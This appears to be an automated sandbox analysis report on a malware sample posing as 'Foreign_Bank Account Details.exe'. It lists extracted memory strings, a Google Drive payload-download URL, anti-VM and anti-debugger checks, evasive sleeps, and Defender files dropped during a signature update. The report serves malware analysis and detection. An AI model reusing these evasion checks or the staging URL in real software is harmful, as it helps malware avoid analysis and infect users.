Source: RegAsm.exe, 00000008.00000002.21890837219.0000000001710000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1HKAWRUHCCVAKL722JOQS1BRIWJN1S8KSWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp Binary or memory string: $C:\PROGRAMDATA\SANDBOXIE\SBIEDLL.DLL
Source: MpSigStub.exe, 00000023.00000003.18334831739.0000015B1A746000.00000004.00000001.sdmp Binary or memory string: !#SLF:AGGR:MASQUERADE_AS!AUTORUNSC.EXE
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXE
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp Binary or memory string: !#SLF:AGGR:MASQUERADE_AS!PROCMON.EXE
Source: MpSigStub.exe, 00000023.00000003.18299514362.0000015B1AF02000.00000004.00000001.sdmp Binary or memory string: BEHAVIORDUMPER.EXE
Source: MpSigStub.exe, 00000023.00000003.18286537046.0000015B1A3C2000.00000004.00000001.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp Binary or memory string: PTABLE)(LAPTOP)(NOTEBOOK)(SUB NOTEBOOK)%S \%D.%D.%D.%D%04X%04XSBIEDLL.DLLDBGHELP.DLLAPI_LOG.
Source: MpSigStub.exe, 00000023.00000003.18299634028.0000015B1AF1A000.00000004.00000001.sdmp Binary or memory string: REGMON.EXE
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp Binary or memory string: !#SLF:AGGR:MASQUERADE_AS!AUTORUNS.EXE
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLLSBIEDLLX.DLLHTTP://
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp Binary or memory string: SANDBOXIEDCOMLAUNCH.EXE
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDINAME_PROCMON.EXE
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDINAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp Binary or memory string: \MSNSNIFFER\MSNSNIFFER.EXE]
Source: Foreign_Bank Account Details.exe, 00000001.00000002.17634657037.00000000022D0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDONAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp Binary or memory string: %Z!#SLF:AGGR:MASQUERADE_AS!AUTORUNS.EXE
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp Binary or memory string: &\MSNSNIFFER\MSNSNIFFER.EXE]
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp Binary or memory string: QEMU-GA.EXE
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDONAME_PROCMON.EXE
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp Binary or memory string: !#SLF:AGGR:COPYRENAMED!AUTORUNS.EXE
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDONAME_AUTORUNS.EXE
Source: MpSigStub.exe, 00000023.00000003.18329672768.0000015B1ADDA000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: MpSigStub.exe, 00000023.00000003.18302834450.0000015B1BFE8000.00000004.00000001.sdmp Binary or memory string: |ACCESSCHK.EXE|ACCESSCHK64.EXE|ACCESSENUM.EXE|ACRORD32.EXE|ADEXPLORER.EXE|ADINSIGHT.EXE|ADRESTORE.EXE|APPLICATIONFRAMEHOST.EXE|APPVCLIENT.EXE|APPVLP.EXE|ATBROKER.EXE|AUDIODG.EXE|AUTORUNS.EXE|AUTORUNS64.EXE|AUTORUNSC.EXE|AUTORUNSC64.EXE|BASH.EXE|BGINFO.EXE|BGINFO64.EXE|BITSADMIN.EXE|BROWSER_BROKER.EXE|CALC.EXE|CDB.EXE|CERTUTIL.EXE|CLOCKRES.EXE|CLOCKRES64.EXE|CMD.EXE|CMDKEY.EXE|CMSTP.EXE|CONHOST.EXE|CONSENT.EXE|CONTIG.EXE|CONTIG64.EXE|CONTROL.EXE|COREINFO.EXE|CSC.EXE|CSCRIPT.EXE|CSI.EXE|CSRSS.EXE|CTFMON.EXE|CTRL2CAP.EXE|DASHOST.EXE|DATAEXCHANGEHOST.EXE|DBGVIEW.EXE|DFSVC.EXE|DISK2VHD.EXE|DISKEXT.EXE|DISKEXT64.EXE|DISKSHADOW.EXE|DLLHOST.EXE|DNSCMD.EXE|DNX.EXE|DXCAP.EXE|ESENTUTL.EXE|EXPAND.EXE|EXPLORER.EXE|EXTEXPORT.EXE|EXTRAC32.EXE|FINDLINKS.EXE|FINDLINKS64.EXE|FINDSTR.EXE|FONTDRVHOST.EXE|FORFILES.EXE|FXSSVC.EXE|GPSCRIPT.EXE|GPUP.EXE|HANDLE.EXE|HANDLE64.EXE|HEX2DEC.EXE|HEX2DEC64.EXE|HH.EXE|IE4UINIT.EXE|IEEXEC.EXE|INFDEFAULTINSTALL.EXE|INSTALLUTIL.EXE|JUNCTION.EXE|JUNCTION64.EXE|LDMDUMP.EXE|LIVEKD.EXE|LIVEKD64.EXE|LOADORD.EXE|LOADORD64.EXE|LOADORDC.EXE|LOADORDC64.EXE|LOCKAPP.EXE|LOGONSESSIONS.EXE|LOGONSESSIONS64.EXE|LSAISO.EXE|LSASS.EXE|MAKECAB.EXE|MAVINJECT.EXE|MFTRACE.EXE|MICROSOFTEDGE.EXE|MICROSOFTEDGECP.EXE|MICROSOFTEDGESH.EXE|MSBUILD.EXE|MSCONFIG.EXE|MSDEPLOY.EXE|MSDT.EXE|MSDTC.EXE|MSHTA.EXE|MSIEXEC.EXE|MSXSL.EXE|NETSH.EXE|NLNOTES.EXE|NLTEST.EXE|NOTES.EXE|NOTMYFAULT.EXE|NOTMYFAULT64.EXE|NOTMYFAULTC.EXE|NOTMYFAULTC64.EXE|NTFSINFO.EXE|NTFSINFO64.EXE|NTOSKRNL.EXE|NVUDISP.EXE|NVUHDA6.EXE|ODBCCONF.EXE|OPENWITH.EXE|PAGEDFRG.EXE|PCALUA.EXE|PCWRUN.EXE|PENDMOVES.EXE|PENDMOVES64.EXE|PIPELIST.EXE|PIPELIST64.EXE|POWERSHELL.EXE|PRESENTATIONHOST.EXE|PRINT.EXE|PROCDUMP.EXE|PROCDUMP64.EXE|PROCEXP.EXE|PROCEXP64.EXE|PROCMON.EXE|PSEXEC.EXE|PSEXEC64.EXE|PSFILE.EXE|PSFILE64.EXE|PSGETSID.EXE|PSGETSID64.EXE|PSINFO.EXE|PSINFO64.EXE|PSKILL.EXE|PSKILL64.EXE|PSLIST.EXE|PSLIST64.EXE|PSLOGGEDON.EXE|PSLOGGEDON64.EXE|PSLOGLIST.EXE|PSLOGLIST64.EXE|PSPASSWD.EXE|PSPASSWD64.EXE|PSPING.EXE|PSPING64.EXE|PSR.EXE|PSSERVICE.EXE|PSSERVICE64.EXE|PSSHUTDOWN.EXE|PSSUSPEND.EXE|PSSUSPEND64.EXE|PWSH.EXE|RAMMAP.EXE|RCSI.EXE|REG.EXE|REGASM.EXE|REGDELNULL.EXE|REGDELNULL64.EXE|REGEDIT.EXE|REGISTER-CIMPROVIDER|REGJUMP.EXE|REGSVCS.EXE|REGSVR32.EXE|REPLACE.EXE|ROBOCOPY.EXE|ROCCAT_SWARM.EXE|RPCPING.EXE|RUNDLL32.EXE|RUNONCE.EXE|RUNSCRIPTHELPER.EXE|RUNTIMEBROKER.EXE|SC.EXE|SCRIPTRUNNER.EXE|SDELETE.EXE|SDELETE64.EXE|SDIAGNHOST.EXE|SEARCHFILTERHOST.EXE|SEARCHINDEXER.EXE|SEARCHPROTOCOLHOST.EXE|SECURITYHEALTHSERVICE.EXE|SERVICES.EXE|SETTINGSYNCHOST.EXE|SGRMBROKER.EXE|SIGCHECK.EXE|SIGCHECK64.EXE|SIHOST.EXE|SMARTSCREEN.EXE|SMSS.EXE|SPLWOW64.EXE|SPOOLSV.EXE|SPPSVC.EXE|SQLDUMPER.EXE|SQLPS.EXE|SQLTOOLSPS.EXE|STREAMS.EXE|STREAMS64.EXE|SURFACECOLORSERVICE.EXE|SURFACESERVICE.EXE|SVCHOST.EXE|SYNCAPPVPUBLISHINGSERVER.EXE|SYNCHOST.EXE|SYSMON.EXE|SYSMON64.EXE|SYSTEMSETTINGSBROKER.EXE|TASKHOSTW.EXE|TASKMGR.EXE|TCPVCON.EXE|TCPVIEW.EXE|TE.EXE|TRACKER.EXE|USBINST.EXE|VBOXDRVINST.EXE|VMCOMPUTE.EXE|VMMAP.EXE|VMMS.EXE|VSJITD
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: \MSTRACER.DLL
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp Binary or memory string: SNIFFER.EXE
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp Binary or memory string: PEBROWSEDBG.EXE
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp Binary or memory string: IFPROCESSEXISTS("SANDBOXIERPCSS.EXE")ORPROCESSEXISTS("SANDBOXIEDCOMLAUNCH.EXE")THEN
Source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXE
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18305343223.0000015B1C4E5000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXE
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL]
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp Binary or memory string: $Y!#SLF:AGGR:MASQUERADE_AS!PROCMON.EXE
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp Binary or memory string: DIR_WATCH.DLL
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLLA
Source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp Binary or memory string: *.LOG.|!\FABRICOBSERVER.EXE
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp Binary or memory string: #I!#BM_COPYRENAMEDONAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: MpSigStub.exe, 00000023.00000003.18299514362.0000015B1AF02000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp Binary or memory string: SANDBOXIERPCSS.EXE
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: "G!#BM_COPYRENAMEDINAME_AUTORUNS.EXE
Source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !E!#BM_COPYRENAMEDINAME_PROCMON.EXE
Source: MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp Binary or memory string: #I!#BM_COPYRENAMEDINAME_AUTORUNSC.EXE
Source: Foreign_Bank Account Details.exe, 00000001.00000002.17634657037.00000000022D0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.21890837219.0000000001710000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp Binary or memory string: RC:\PROGRAM FILES\WIRESHARK\WIRESHARK.EXE
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXE
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: MpSigStub.exe, 00000023.00000003.18299514362.0000015B1AF02000.00000004.00000001.sdmp Binary or memory string: FAKEHTTPSERVER.EXE
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp Binary or memory string: SNIFF_HIT.EXE
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp Binary or memory string: BSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\WIRESHARK.EXE
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Tries to detect Any.run
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4908 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe TID: 2016 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe TID: 644 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe TID: 4968 Thread sleep time: -30000s >= -30000s
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 9947 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdBoot.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpAzSubmit.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpDetoursCopyAccelerator.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpavbase.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpavdlta.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpAsDesc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\endpointdlp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpasdlta.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpDetoursCopyAccelerator.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpasbase.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpDetours.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdDevFlt.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSvc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpCmdRun.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\NisSrv.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpCmdRun.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\endpointdlp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdFilter.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\mpextms.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpEvMsg.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpUpdate.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdNisDrv.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpAsDesc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ProtectionManagement.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\DefenderCSP.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpUxAgent.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpRtp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MsMpEng.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpDetours.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpCommu.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ConfigSecurityPolicy.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpDlpCmd.exe Jump to dropped file
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: *.AVHDX.|*|Microsoft-Hyper-V
